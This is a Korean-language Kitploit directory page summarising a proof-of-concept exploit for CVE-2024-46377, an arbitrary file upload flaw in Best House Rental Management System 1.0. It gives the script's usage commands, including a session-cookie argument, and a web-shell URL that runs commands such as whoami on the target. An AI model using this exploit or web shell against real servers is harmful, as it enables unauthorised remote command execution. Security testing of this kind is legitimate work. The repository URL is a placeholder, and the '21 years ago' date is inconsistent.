Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-46377 | Kitploit
도구/GitHubGitHub/vidura2/cve-2024-46377
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubvidura2/cve-2024-46377

CVE-2024-46377

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-46377

Best House Rental Management System 1.0의 임의 파일 업로드 취약점에 대한 PoC

개요

이 Python 스크립트는 Best House Rental Management System 1.0의 임의 파일 업로드 취약점을 악용하는 방법을 보여줍니다. 이 취약점으로 인해 공격자는 악성 파일(예: PHP 웹 셸)을 업로드하고 대상 서버에서 임의의 명령을 실행할 수 있습니다.

사용법

  1. 저장소를 클론하고 해당 디렉터리로 이동합니다:

    root@kitploit:~
    git clone https://github.com/yourusername/house-rental-poc.git
    cd house-rental-poc
    

    다음 매개변수를 사용하여 익스플로잇을 실행합니다:

    bash

    python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>

    target_url: 취약한 파일 업로드 페이지의 URL (예: http:///rental/admin_class.php?view=save_settings) file_upload_path: 업로드된 파일이 저장되는 경로 (예: http:///path/to/uploaded/files) session_cookie: 인증된 사용자의 세션 쿠키

성공하면 대상 서버에서 다음 URL에 접속하여 명령을 실행할 수 있습니다:

bash

root@kitploit:~
http://<file_upload_path>/shell.php?cmd=whoami

whoami 또는 uname -a와 같은 명령을 실행하여 테스트합니다.

예제

python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789

이 코드는 MIT License에 따라 배포됩니다.

도구 다운로드